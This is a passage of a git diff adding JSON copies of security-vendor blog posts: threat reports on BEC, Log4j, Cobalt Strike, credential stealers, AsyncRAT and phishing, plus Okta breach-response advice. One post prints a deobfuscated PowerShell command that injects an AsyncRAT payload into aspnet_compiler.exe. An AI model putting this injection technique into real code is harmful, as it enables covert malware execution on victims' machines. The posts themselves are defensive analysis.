ahead in a constantly evolving threat landscape is through an approach to security that\u2019s also constantly evolving. What does that look like? Technological innovation, human ingenuity and expertise, and inclusivity in our defender community. Vasu Jakkal, Corporate Vice President for Microsoft Security, Compliance, Identity Management and Privacy, argued that the best way to overcome this challenge is to create a more inclusive environment where people from many different backgrounds are empowered to do their best work and thrive. We echo this sentiment wholeheartedly at Expel, and stand by the belief that we\u2019re \u201cbetter when different.\u201d We know we\u2019re stronger when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. (More on Jakkal\u2019s ideas for breaking down barriers in cybersecurity, and how we practice equity, diversity, and inclusion on a day-to-day basis at Expel in our day two RSA recap .) In a time of economic change, ROI is more important than ever. While this year\u2019s conference was a taste of normalcy, we can\u2019t ignore that the current economic situation has and will have an effect on the industry\u2014for customers and vendors alike. With so many companies vying for their share of the market, the security providers that will ultimately stand out are the ones that can demonstrate value and deliver a positive return on investment (ROI). Companies that put an emphasis on enhanced reporting\u2014helping customers understand and translate their investments to decision makers\u2014will stand above the competition. The overwhelming sentiment from the week was how happy security folks were to be back in person with this close-knit community. Our cheeks are still aching from all the smiling, as we reconnected with colleagues and even met some in-person for the first time. It can sometimes be easy to forget, but there\u2019s a human element that sits at the core of the security industry. It\u2019s conferences like this\u2014where we\u2019re able to swap stories, trade lessons learned, and share a laugh\u2014that remind us why we do what we do. The jet lag is finally wearing off and we\u2019re already getting excited to gear up for next year! ICYMI, we spent the week leading up to RSA sharing news about recent momentum , product advancements , and even a new partnership with Armis \u2014and we can\u2019t wait to keep the good news coming. If you\u2019re curious about what makes Expel, Expel\u2014 we\u2019d love to chat anytime ." +} \ No newline at end of file diff --git a/top-5-takeaways-expel-quarterly-threat-report-q2.json b/top-5-takeaways-expel-quarterly-threat-report-q2.json new file mode 100644 index 0000000000000000000000000000000000000000..2e06374f1bfd936c71c8e223255075d8155f70a3 --- /dev/null +++ b/top-5-takeaways-expel-quarterly-threat-report-q2.json @@ -0,0 +1,6 @@ +{ + "title": "Top 5 takeaways: Expel Quarterly Threat Report Q2", + "url": "https://expel.com/blog/top-5-takeaways-expel-quarterly-threat-report-q2-2022/", + "date": "Aug 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 5 takeaways: Expel Quarterly Threat Report Q2 Security operations \u00b7 3 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 AUG 9, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Just like that, a new quarter is upon us and we\u2019re back with our second Expel Quarterly Threat Report. The series, which debuted in the first quarter (Q1) of 2022, provides cybersecurity data, trends, and recommendations to help you protect your organization. The second quarter (Q2) edition dives into the trends our security operations center (SOC) identified through investigations into alerts, email submissions, and threat hunting leads from April 1 to June 30, 2022. We\u2019ve identified some insights and patterns to help guide strategic decision-making and operational processes for your team using a combination of time-series analysis, statistics, customer input, and analyst instinct. Our goal? By sharing how attackers got in, and how we stopped them, we hope to translate the events we detect into security strategy for your organization. Here are our top five takeaways. TL;DR: Microsoft blocking macros by default is changing the game for threat actors and defenders alike; legacy MFA in cloud apps and cloud identity providers simply isn\u2019t cutting it; and business email compromise (BEC) will continue to reign supreme in Q3. 1: Hackers are shifting their pre-ransomware approach, thanks in part to Microsoft In Q1, our report noted that macro-enabled Microsoft Word documents (VBA macro) and Excel 4.0 macros were the initial attack vectors in 55% of all pre-ransomware incidents. But in Q2, Excel 4.0 macro attacks fell to 9% and VBA macro initial attacks dropped to zero. What changed? Microsoft began blocking macros by default in Office applications, so threat actors all but abandoned the use of VBA and Excel 4.0 macros for initial entry. Instead, they opted to use ISO, LNK, and ZIP files that store other files for initial access. In fact, the use of ISO files for initial access increased 15% compared to Q1. We\u2019re advising our customers to block ISO files at email and web gateways. But proceed with caution: many businesses use these files in the regular course of business. Also, consider unregistering ISO file extensions in Microsoft Windows Explorer. By doing so, ISO files will no longer be recognized by Windows and double-clicking won\u2019t result in program execution. 2: Identity-based attacks are still the elephant in the room\u2026 and they aren\u2019t going away Allie Mellen, independent senior analyst, recently tweeted, \u201c Identity is the new endpoint ,\u201d and we tend to agree. Identity-based attacks (credential theft, credential abuse, long-term access key theft) accounted for 56% of all incidents handled by our SOC in Q2. Business email compromise (BEC) remains public enemy number one, accounting for 45% of all incidents\u2014with 100% occuring in Microsoft Office 365 (O365). For context here, we monitor roughly twice as many O365 tenants as we do Google Workspace, but the fact that we didn\u2019t identify any BEC attempts in Google Workspace is pretty interesting. What\u2019s more, 19% of BEC attempts bypassed MFA in O365 using legacy protocols (up 16 percentage points from Q1). The takeaway? Single-factor authentication backed by conditional access policies aren\u2019t enough to prevent unauthorized access. BEC (unauthorized access into email apps) and business application compromise (BAC, unauthorized access into application data) made up 51% of all incidents, while identity-based attacks in popular cloud environments like AWS accounted for 5%. Unfortunately, we expect threat actors will continue to favor identity-based attacks in Q3. 3: The majority of our leads come from a cloud application or identity provider integration An effective detection and response strategy is more than EDR\u2014it\u2019s identity-oriented. Fifty-four percent of all identified Q2 incidents began with an initial lead from a cloud application or identity provider integration; 38% started with an initial lead from an EDR integration. While network (NDR) and SIEM make up only 7% of initial leads into Q2 incidents, these technologies provide SOC analysts with significant investigative capabilities and power orchestration in the Expel Workbench\u2122. 4: Automation frees up human analysts to do what they do best To improve SOC scale and quality, we automate a lot of our analysts\u2019 repetitive tasks\u2014things like \u201cgrab the Windows event log\u201d or \u201clet\u2019s take a look at 30 days of authentication activity for a given user.\u201d This frees analysts up to focus on risk-based decisions for our customers vs. spending time fighting with a query language to retrieve results. How much of a burden does orchestrated automation take off analysts? Automation, not humans, completed key investigative actions 77% of the time we sent an alert to our SOC for review. When analysts spend less time buried in manual tasks, it boosts scale and levels up quality by standardizing investigative steps. 5: Orchestration dramatically improves remediation time Orchestration not only improves scale and quality in our SOC, but also accelerates remediation. When our SOC identifies an incident, analysts investigate to uncover the scope and create remediation actions to reduce risk. Workbench automatically executes remediation actions for our customers, such as containing a host, disabling an account, removing phishing emails, or adding attacker indicators of compromise (IOCs)/hashes to a \u2018deny\u2019 list. In Q2, the median time to complete a remediation action not automated through orchestration was two hours. What happens when a remediation action is automated via orchestration? That median time drops to seven minutes\u2014a 1640% improvement. We know what you\u2019re thinking\u2014with so many great takeaways in this blog, what more could the full report have in store? See for yourself." +} \ No newline at end of file diff --git a/top-7-recs-for-responding-to-the-lapsus-breach-claims.json b/top-7-recs-for-responding-to-the-lapsus-breach-claims.json new file mode 100644 index 0000000000000000000000000000000000000000..d83b9bb874012f89ede25ffd12969f1a3561d6c5 --- /dev/null +++ b/top-7-recs-for-responding-to-the-lapsus-breach-claims.json @@ -0,0 +1,6 @@ +{ + "title": "Top 7 recs for responding to the Lapsus$ breach claims", + "url": "https://expel.com/blog/top-7-recs-for-responding-to-the-lapsus-breach-claims/", + "date": "Mar 23, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 7 recs for responding to the Lapsus$ breach claims Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 MAR 23, 2022 \u00b7 TAGS: MDR By now, you\u2019ve likely heard about the situation that unfolded yesterday around Okta and the Lapsus$ breach claims. As of today, March 23, 2022, Okta\u2019s investigation is ongoing . While the new information and more limited scope may reduce the risk to organizations, Okta\u2019s investigation continues and the situation remains fluid. This post will walk you through our recommendations for immediate and strategic steps you can take to protect yourself and your org. Here are our top 7 recommendations: Rotate privileged Okta passwords and Okta API tokens. Unless a business need exists, we strongly recommend disabling of the following Okta configurations: Give Access to Okta Support Give Directory Debugger Access to Okta Support Review Okta logs looking at admin authentications and activity for the past four months (January 1 through March 22, 2022 is a good time frame). During this same chunk of time, check out any Okta admin activity to ensure it aligns with expected activities and sources. Specifically, review these events: eventType eq \u201cuser.mfa.factor.deactivate\u201d eventType eq \u201cuser.account.update_password\u201d For these types of events, you\u2019ll need to review entries generated by non-admin users or events marked as \u201cOkta System.\u201d If an Okta account was found to have had MFA disabled during the January through March 22 timeframe, ask these two questions: Who was the user? What was the root cause of the disablement? Once you answer those, re-enable MFA for those accounts. From there, enable MFA on initial Okta login and on all individual applications. Consider how your organization might replace legacy MFA solutions (SMS text and digital tokens) with a FIDO compliant solution. Based on your organization\u2019s geographical presence, consider configuring Okta network zones to deny authentication from countries your organization would consider atypical. Take some time to plan. Establish terms and conditions for incident response services before a security incident by executing an Incident Response (IR) retainer. This proactive approach can significantly reduce response time and impact. Use this as an opportunity to test your incident response plan (IRP). Don\u2019t have an IRP? It\u2019s time to make one. Then test it, and test it again. Communicate transparently about what you\u2019re doing and what you\u2019ve done to your internal and external stakeholders. The clearer you are up front, the less confusion arises as you deal with quick changes that might have a wide effect within your org. When communicating during a fluid situation, it\u2019s important to set expectations and prepare stakeholders for change. In your communications, be clear on what decisions you\u2019ve made, what you know, what you don\u2019t know, and when you\u2019ll be in touch next. Like many of you, we\u2019re watching the situation closely. If you have any questions about our recommendations, chat us anytime ." +} \ No newline at end of file diff --git a/top-attack-vectors-august-2021.json b/top-attack-vectors-august-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..8bf1e8b643c94346af0e1d6d1f75a3b323995727 --- /dev/null +++ b/top-attack-vectors-august-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: August 2021", + "url": "https://expel.com/blog/top-attack-vectors-august-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: August 2021 Security operations \u00b7 5 MIN READ \u00b7 TYLER FORNES AND BRITTON MANAHAN \u00b7 SEP 16, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into security strategy for your org. For this report, our SOC analyzed the incidents we investigated in August 2021 to determine the top attack vectors used by bad actors. A sneak peek at what\u2019s ahead: What to do about business email compromise (BEC) The rise in exploited public-facing vulnerabilities and our #1 resilience recommendation How credential-stealing malware is targeting crypto wallets Business email compromise (BEC) TL;DR: BEC continues to top the charts. Azure AD Identity Protection helps. It\u2019s no surprise to us that in August 2021, 63 percent of incidents our SOC handled were the result of a business email compromise. BEC continues to be the number one attack vector across our customers. However, BEC is different from a standard phishing attack. What we\u2019re looking for in these cases is an attacker abusing a stolen credential (previously phished from a user) and using it to access that user\u2019s inbox \u2013 giving them access to sensitive information. Chaos ensues, and we\u2019ve witnessed everything from mass mail spam to fraudulent wire transfers happen next. Wondering how to get better at identifying BEC? In August, 61 percent of all BEC we responded to was identified by Azure AD Identity Protection. This is no surprise \u2013 last month, we noted that 53 percent of BEC incidents we identified were targeted against Microsoft O365. We can safely assume that Microsoft accounts will remain a prime target for attackers heading into the later months of 2021. But if you\u2019re an org struggling with BEC and looking for a solution, Azure AD Identity Protection can provide help. What do we like about it? Its ability to identify anomalous logins based on tracking a user\u2019s login behavior. Azure AD Identity Protection generates profiles based on this information, then provides dynamic alerting that can be adjusted based on a user\u2019s travel and location history. When a user logs in from two improbable places at once (i.e. the U.S and West Africa), you get an alert. We refer to this as Geo infeasibility at Expel, and it\u2019s the number one way we catch bad actors in inboxes. That being said, a single product won\u2019t solve all your woes here. But the stats speak for themselves. Azure AD Identity Protection is a powerful tool for catching BEC. We\u2019d bet our paychecks that BEC will continue to top the charts of attack vectors for the rest of 2021 and into 2022. If you haven\u2019t reviewed your defenses recently, here\u2019s your monthly reminder to enable multi-factor authentication (MFA) and disable IMAP and POP3. Resilience recommendations: You know we\u2019re going to say it, but MFA everything and everywhere. Conditional access policies are a great way to help mitigate Geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Public-Facing Vulnerabilities TL;DR: Opportunistic attackers are taking advantage of vulnerable web applications more than ever. Incidents involving the exploitation of public-facing web applications rose 400 percent from July 2021. Overall, 55 percent of our critical incidents in August 2021 were found to be the result of an exploited application running on a public-facing web server. Why? We\u2019re finding that most of these attacks are opportunistic, looking to deploy ransomware, coin miners and webshells. In most cases, the scripted delivery of these exploits is the result of internet-wide scanning and allows an opportunistic attacker to broaden their attack surface and proliferate their payload of choice in as many orgs as possible. Once exploited, we notice the early signs of these attacks through detections that monitor a web-working process (such as IIS or Apache) spawning a command shell (cmd/bash/PowerShell). In these relationships, we\u2018re looking for a command shell that\u2019s downloading a second stage payload or performing unusual reconnaissance actions that may indicate the presence of a webshell. Below is a summary of the top web application vulnerabilities we\u2019ve seen exploited across our customer base. One key takeaway: more than half of the vulnerabilities we\u2019ve seen exploited are over two years old. CVE-2019-2725 Oracle WebLogic Server CVE-2019-18935 Telerik UI for ASP.NET AJAX CVE-2018-7669 Sitecore CMS CVE-2017-10271 Oracle WebLogic Server CVE-2021-26084 Confluence Server From our security team to yours \u2013\u2014 identifying and patching border-facing assets should be number one on your to-do list. If you aren\u2019t sure where to start, a few quick queries on Shodan can save you a lot of heartbreak by helping to understand what applications are exposed (and potentially vulnerable) at the border of your network. Here\u2019s a simple one to get you started: net:1.2.3.4/24 (where 1.2.3.4 is your network range in CIDR notation) Resilience recommendations: Deploy an Endpoint Defense and Response (EDR) tool on web servers. Scan and identify public-facing assets using Shodan . Ensure public web applications are patched to their latest version. Deploy a Web Application Firewall (WAF). Credential Stealers TL;DR: Attackers are hungrier than ever for crypto. Keep your wallets safe! Commodity malware is riddled with credential stealers, and we see a lot of them. In fact, we noticed that 15 percent of incidents we identified in August included the deployment of credential stealing malware by an attacker \u2014 a 114 percent increase from July 2021. We noticed several samples of the REDLINE malware being deployed throughout our customer base. In all cases, REDLINE was delivered through a zipped executable to the user, likely through a phishing email. These campaigns rely on the \u201cdouble click and let it rip\u201d principle, where user interaction is required to kick off the infection. We talked at length about this in July\u2019s report , and firmly expect the trend of threat actors favoring user execution to continue. We dug through several samples of REDLINE during August 2021 and had a few surprising findings. First, what\u2019s old is new again \u2014 all samples of REDLINE that we analyzed used the Nullsoft Scriptable Install System to kick off the malware installation. A blast from the past, but a solid way of presenting a familiar and user-friendly interface for installing \u201csoftware.\u201d Second, as August progressed and we observed additional REDLINE samples, we noticed that the malware started to heavily target cryptocurrency wallets resident on the infected machines. It became obvious that as trends in cryptocurrency favored certain coins, REDLINE developers were quick to add wallets of high value. This is a good reminder that credential stealers are highly configurable and also often target stored credentials in browsers, financial services and other legitimate software. As 2021 beats on, it\u2019s more important than ever to talk to your users about trusted software and identifying suspicious applications. Nine times out of ten, if someone emails you a zip file and asks you to install a piece of software, it\u2019s likely bad. Resilience recommendations: We know it\u2019s a tall order, but spend some time educating your users about trusted software and identifying suspicious applications. Consider implementing an application safelisting tool (like Windows Defender Application Control) to help defend against malicious software installation. Consider implementing/tuning your email gateway to inspect zipped attachments that include executables, or encrypted zip files. Takeaways August continued to prove that BEC isn\u2019t going away anytime soon. You know our top recommendation \u2014 MFA, MFA, MFA. But also take a look at how Azure AD Identity Protection may be able to help your org clamp down on BEC attempts through Geo infeasibility notifications. Also check out our phishing recommendations in last month\u2019s report to keep bad actors from accessing credentials in the first place. Next: exploitation of vulnerabilities in public-facing web apps is on the rise. Number one on the to-do list is to identify and patch border-facing assets \u2014 Shodan is a great tool to help identify exposure. Then consider taking some of the additional resilience actions we\u2019ve discussed, like deploying an EDR tool and a Web Application Firewall (WAF). Lastly, user execution will remain bad actors\u2019 preferred method of infection. So ramp up user education on trusted software and identifying suspicious applications to keep malicious zipped attachments from impacting your org. Also watch out for users\u2019 crypto wallets as malware adapts to target new trends in cryptocurrency. We\u2019ll be back with insights on September\u2019s top attack vectors. Have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-december-2021.json b/top-attack-vectors-december-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..2e174f499f0f7cd4dec7b1774760756a13315bf2 --- /dev/null +++ b/top-attack-vectors-december-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: December 2021", + "url": "https://expel.com/blog/top-attack-vectors-december-2021/", + "date": "Jan 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: December 2021 Security operations \u00b7 7 MIN READ \u00b7 BRITTON MANAHAN \u00b7 JAN 13, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in December 2021 to determine the top attack vectors used by threat actors. In a month with cybersecurity news about the Log4j vulnerability making top headlines, here\u2019s what stood out: Threat actors performing large-scale scans to exploit systems using the Log4j zero-day vulnerability Attackers continuing to use the Cobalt Strike command and control toolkit as malware Threat actors using a new attack pattern to deploy ransomware Attackers authenticating into an isolated Citrix remote access session, then breaking out of it Read on to learn more and see our tips for what to do about all of the above. Log4j vulnerability was a top target TL;DR: The recently-discovered Log4j vulnerability was a major target in December as attackers tried to outrun remediation by scanning the web for unpatched instances to exploit. This probably isn\u2019t your first time hearing about the Apache Log4j zero-day vulnerability discovered in early December 2021. It\u2019s now considered one of the most impactful vulnerabilities uncovered in recent years. In a nutshell, this vulnerability allows for arbitrary remote code execution by exploiting a flaw in JNDI lookups performed by the Log4j Java logging library. This vulnerability is so devastating because of the number of software applications and libraries that rely on Log4j, putting hundreds of millions of devices at risk . We\u2019ve received a steady stream of alerts related to the widespread scanning activity threat actors are conducting to locate vulnerable systems. And since this commonly-used logging library provides such a large attack surface, it\u2019s no surprise that attackers are finding success. In fact, 100 percent of incidents involving public-facing exploits that we investigated in December were a result of the Log4j zero-day vulnerability. Out of the successful Log4j exploits we observed, 50 percent established a remote shell on the exploited system while the other half deployed malware like Cobalt Strike. The incidents involving remote shells may have been first steps towards deploying malware, but were detected and the systems contained before attackers had the chance. When we have evidence that malware\u2019s running on a system, our priorities are to stop it, then figure out how it got there. In December, many of our initial leads were broad internet scanning activity that we then had to investigate further to determine whether any successful Log4j exploitation actually occurred. And proving something malicious didn\u2019t happen is definitely the more time-consuming task. So we spent a lot of time examining network activity on the targeted hosts for potential successful callbacks to attacker-controlled endpoints. Due to the up-stream nature of the Log4j library (meaning its use by third-party apps and libraries), it can be difficult for orgs to know which of their systems may be running Log4j and are vulnerable to an exploit. As a result, this vulnerability will likely remain relevant for some time, even though patches have been released. Resilience recommendations: Determine if you\u2019re logging applications to other managed logging platforms (local or cloud-hosted). Validate whether these apps are vulnerable and/or impacted by this zero-day vulnerability. Use a vulnerability scan to confirm your findings and attack surface for this vulnerability. Anyone using Log4j should update to version 2.17.1 ASAP. The latest version is already on the Log4j download page . The patched version of Log4j 2.17.1 requires a minimum of Java 8. If you\u2019re on Java 7, you\u2019ll need to upgrade to Java 8. If updating to the latest version isn\u2019t possible, you can also mitigate exploit attempts by removing the JndiLookup class from the classpath. Cobalt Strike TL;DR: Cobalt Strike was the most common malware family we observed in December and continues to be a favorite of threat actors. In December 2021, 20 percent of the incident payloads we identified were variants of the Cobalt Strike penetration testing command and control (C2) framework. While originally designed as a paid tool for legitimate engagements, Cobalt Strike\u2019s module nature and capabilities have made it a favorite tool of threat actors. It\u2019s also motivated them to crack versions and release them on the secret web. The Cobalt Strike Beacon payload can be generated in many forms, including a stand-alone exe, but it\u2019s most often reflectively loaded into memory by an initial stage payload as a file-less loaded DLL. The functionality provided by this framework includes (but isn\u2019t limited to) command and script execution, covert encryption communication over different network protocols, file uploads and downloads, reconnaissance, privilege escalation, and lateral movement. Threat actors used several delivery methods and first stage payloads in December to ultimately try to establish a C2 connection through a Cobalt Strike Beacon. The initial infection vectors for these incidents included: Phishing Public-facing exploitation of Log4j Drive-by download Using those infection vectors, attackers delivered these first stage payloads to then try to load different variants of a Cobalt Strike Beacon: BazarLoader Gootkit Generic Obfuscated PowerShell Clearly, threat actors are using a variety of infection vectors to deploy an initial malware stage embedded with or configured to download a Cobalt Strike Beacon payload. Attackers have a wide range of choices for this initial stage, using Windows executables or scripting languages across different malware variants. But they typically avoid having the Beacon payload touch persistent storage when loading it into memory (file-less malware). Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Perform a vulnerability scan against your externally facing systems. Consideration conducting internal or external penetration testing using a legitimate version of the Cobalt Strike framework . Implement network layer controls capable of detecting or blocking traffic to low reputation destinations. Conduct regular security awareness training for your employees with a focus on phishing. Other incidents of note TL;DR: Two particularly interesting incidents stood out in December \u2013 one where threat actors were likely preparing to deploy ransomware and another where they broke out of a remote access Citrix session. One incident of note that we observed in December highlights a recent pattern across attack lifecycle stages used to ultimately deploy ransomware across an environment. The incident began with a phishing email used to deploy the initial BazarLoader malware payload, which communicated out over a URL that tried to appear related to Zoom \u2013 our first indicator of malicious activity. The indicators of compromise (IOCs) from this incident directly correlated to an ongoing campaign where attackers use BazarLoader to download and load a Cobalt Strike Beacon into memory to start internal reconnaissance on the network and establish a valid method of lateral movement. Threat actors then typically begin widespread deployment of the Diavol family of ransomware. However, we detected this activity early in its lifecycle and contained the system that the attackers were using as an entry point before they could deploy ransomware. A second notable incident we detected and responded to in December involved a server running the Citrix remote access application. After obtaining credentials provided to a third-party vendor, the threat actors were able to authenticate into a Citrix remote access session running on the server. The most interesting part of this incident happened next \u2013 the attackers were able to break out of this isolated session with a method using Internet Explorer . We determined this through the process tree, which showed Internet Explorer as the parent process for several command prompt, PowerShell, and system reconnaissance-related processes. After breaking out of the isolated Citrix session, the attacker acquired credentials and used Remote Desktop Protocol (RDP) to move laterally in the environment and access several additional systems. However, they were detected and expelled from the environment before they had time to exfiltrate any sensitive data or perform any other harmful activities. Resilience recommendations Regularly perform an external penetration test to make sure your environment is prepared to detect advanced tactics and techniques. Review your company\u2019s incident response process and procedures to make sure you can confirm true positives and respond promptly to incidents in progress to minimize the impact a threat actor can have. Confirm your endpoint detection and response (EDR) coverage to maximize your visibility and ability to respond in your environment. Takeaways Phishing remained the most common attack vector in December ( check out our top resilience recs !), but we also observed a bunch of novel trends and incidents. The recently-discovered Log4j zero-day vulnerability is historic because of its frequent use as an error logging library in a variety of Java-based apps. Threat actors wasted no time starting to mass scan the Internet for vulnerable systems and try exploits to establish remote shells or deploy malware. While activity related to this vulnerability has come down from its peak in December, Log4j will stay relevant for some time because of its widespread (and sometimes difficult to identify) impact. If you haven\u2019t already, it\u2019s critical to understand which of your systems are running Log4j and make sure they\u2019re updated to version 2.17.1. The most common malware payload we observed in December was the Cobalt Strike Beacon. Attackers are more and more drawn to cracked versions of this penetration testing software released on the secret web because of the number of built-in features it provides and its high level of stability. To avoid detection, this command and control framework is most commonly reflectively loaded into memory by the initial payload delivered to the host, without touching persistent storage. To help defend against malicious Cobalt Strike, focus on initial infection vectors by conducting regular security training for your employees and performing vulnerability scans of your externally-facing systems. We also highlighted two interesting incidents that we responded to in December. One of these involved a recent threat actor campaign following an established formula for typical network intrusion. This flow uses a phishing email as the initial entry point to deliver a first stage payload. The first stage malware then brings down additional functionality to perform internal reconnaissance, privilege escalation, and lateral movement. Once the attacker is satisfied with the level of access they\u2019ve gained in the environment, they\u2019ll deploy a ransomware variant. But in this particular incident, the threat actor was detected and stopped before they could release ransomware into the environment. Another notable incident in December involved a Citrix remote session authenticated through compromised third-party credentials. The attacker was able to break out of this isolated Citrix session with one of several methods that use Internet Explorer. Once the threat actor broke out and had access to the underlying server, they were able to gather credentials to start moving laterally before they were expelled from the environment. Consider having an external third party perform a penetration test in your environment to evaluate your security controls against sophisticated attacker techniques. We\u2019ll be back with insights on January\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-february-2022.json b/top-attack-vectors-february-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..3518199c609af302b7a4530cee7a5b85bdf32f4e --- /dev/null +++ b/top-attack-vectors-february-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: February 2022", + "url": "https://expel.com/blog/top-attack-vectors-february-2022/", + "date": "Mar 17, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: February 2022 Security operations \u00b7 8 MIN READ \u00b7 BRITTON MANAHAN, SIMON WONG AND HIRANYA MIR \u00b7 MAR 17, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in February 2022 to determine the top attack vectors used by threat actors. Here\u2019s what stood out this month: Attackers using tried and true tactics \u2013 including Log4j \u2013 to infiltrate systems and deploy coin miners Threat actors deploying the \u201cAsyncRAT\u201d remote administration tool through an ISO file Phishing tactics targeting credentials through Adobe and cryptocurrency Keep reading for details and our tips on what to do about all the above. The usual suspects TL;DR: It\u2019s important to keep an eye on known threats even as new ones emerge. We observed attackers using multiple threat vectors and tactics this month that we\u2019ve highlighted in previous reports. In February 2022, we observed a more even distribution of non-phishing threat vectors, with the usual suspects from previous reports making a reappearance. This includes removable media ranking as the initial vector for five percent of February\u2019s incidents, indicating it remains a relevant threat after our discussion in last month\u2019s report . The second-most frequent attack vector in February was the use of valid credentials. In two of the incidents involving valid credentials, we saw attackers authenticate into cloud-based single sign-on (SSO) identity providers. We detected and stopped this activity before attackers could progress based on logins from abnormal countries and the identity provider reporting suspicious activity for the account. We previously covered the opportunities available to threat actors who gain access to SSO accounts in our September 2021 report. Phishing emails containing links to credential harvesters and other types of credential exposure or reuse increase the risk of threat actors gaining access to any business apps provisioned by the SSO provider. It\u2019s not uncommon for credential harvester pages to mimic popular SSO cloud identity providers like Okta . While down significantly from previous months, we also observed one public-facing exploit used to deploy a crypto miner in February. In this incident, the attacker took advantage of the Log4j vulnerability, which we detected based on indicators of compromise (IOCs) matching a current threat actor campaign . In our December 2021 report, we spoke about how the downstream nature and prevalence of this Java logging library will keep this vulnerability relevant for some time. Another trend called out in our October 2021 report was cybercriminals targeting cryptocurrency by highjacking computing resources to mine for rewards \u2014 also known as cryptojacking. In the previously mentioned Log4j incident, we saw the threat actor use their unauthorized access to deploy the XMrig crypto mining software. Despite the current dip in the cryptocurrency market, threat actors are clearly still interested in acquiring cryptocurrency as 15 percent of payloads deployed in critical incidents we investigated in February were crypto mining software. Resilience recommendations: Make sure your security awareness training includes sections on the dangers of external USB storage devices. Implement phish-resistant MFA everywhere (FIDO/WebAuthn). Enforce MFA prompts when users connect to sensitive apps through app-level MFA. Conduct a vulnerability scan to understand your attack surface and detect any vulnerabilities present on public-facing systems. If you\u2019re using Log4j, you should update to version 2.17.1 ASAP if you haven\u2019t already. The latest version is on the Log4j download page . The patched version of Log4j 2.17.1 requires a minimum of Java 8. If you\u2019re on Java 7, you\u2019ll need to upgrade to Java 8. If updating to the latest version isn\u2019t possible, you can also mitigate exploit attempts by removing the JndiLookup class from the classpath. AsyncRAT TL;DR: We observed AsyncRAT malware used as a payload in several incidents this month. The AsyncRAT malware variant made up 15 percent of all identified malware payloads for incidents we responded to in February 2022. AsyncRAT is an open-source remote administration tool (RAT) written in C# and available on GitHub. Its functionality includes all the standard RAT abilities, including file uploading, downloading, and command execution. The incidents we encountered deployed AsyncRAT using an initial ISO file, which was mounted on the local computer system as a drive containing a VBScript file. When executed, this initial VBScript file launches a PowerShell script that\u2019s responsible for decompressing two DotNet modules. One of these DotNet modules is loaded into memory by the PowerShell script while the raw bytes for the second module are passed as a parameter to the initial module. The initial DotNet module loaded into memory by the PowerShell script then injects the second DotNet module (the AsyncRAT payload) into a process supplied as a parameter. In both incidents, aspnet_compiler.exe, the compilation tool for ASP.NET website projects, was the target process for this final AsyncRAT payload. The deobfuscated command from the PowerShell script used to achieve this AsyncRAT injection was: [Reflection.Assembly]::Load($InjectionModule).GetType(\u2018NV.b\u2019).$get1(\u2018Execute\u201d).Invoke($null,(\u2018C:WindowsMicrosoft.NEtFrameworkv4.0.30319aspnet_compiler.exe\u2019,$ASyncRAT)) $InjectionModule is the DotNet Module that performs the process injection based on the target program ( aspnet_compiler.exe in this example) and $AsyncRAT holds the raw bytes for the AsyncRAT remote access payload that will be injected into the remote process. Additionally, our analysis found that the DotNet modules from one of these incidents added a level of obfuscation by using the ConfuserEx DotNet module obfuscator to avoid detection of the fileless DotNet module components. These components are considered fileless because their unobfuscated and decompressed versions are never written to persistent storage, but are loaded into the live run-time memory of the local computer system. Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Configure Windows Script Host (WSH) files to open in Notepad. By associating these file extensions with Notepad, you mitigate a primary entry point. Implement layered security controls across your environment to detect and prevent evolving threats. Perform a penetration test against your environment to evaluate any gaps in your security. Subscribe to open source intelligence (OSINT) feeds to stay up-to-date on malware trends and use this intelligence in your deployed security tech. Phishing TL;DR: We saw an increase in credential harvesters using Adobe services and cryptocurrency scam emails in February 2022. As usual, phishing was the biggest attack vector used by threat actors in February, involved in 57 percent of the incidents we investigated. We reviewed over 5,000 potentially malicious email submissions and identified two key phishing trends using the following techniques: Credential harvesters using Adobe services We noticed an increase in the number of emails using legitimate Adobe domains. Attackers are taking advantage of the ability to register an adobe.com subdomain through Adobe Campaign to give their emails a sense of legitimacy. Emails from this trend typically contain requests to collaborate on new projects, aiming to deceive recipients into believing the emails are legitimately work-related. Phishing invitation to view a fake business proposal using Adobe services Recipients are instructed to follow links that redirect them to what seems to be an Adobe webpage, but actually prompts them to download a file containing malicious code or click another link to navigate to a fake sign-in page. If the victim then enters their credentials, threat actors capture them and can begin a business email compromise attempt. 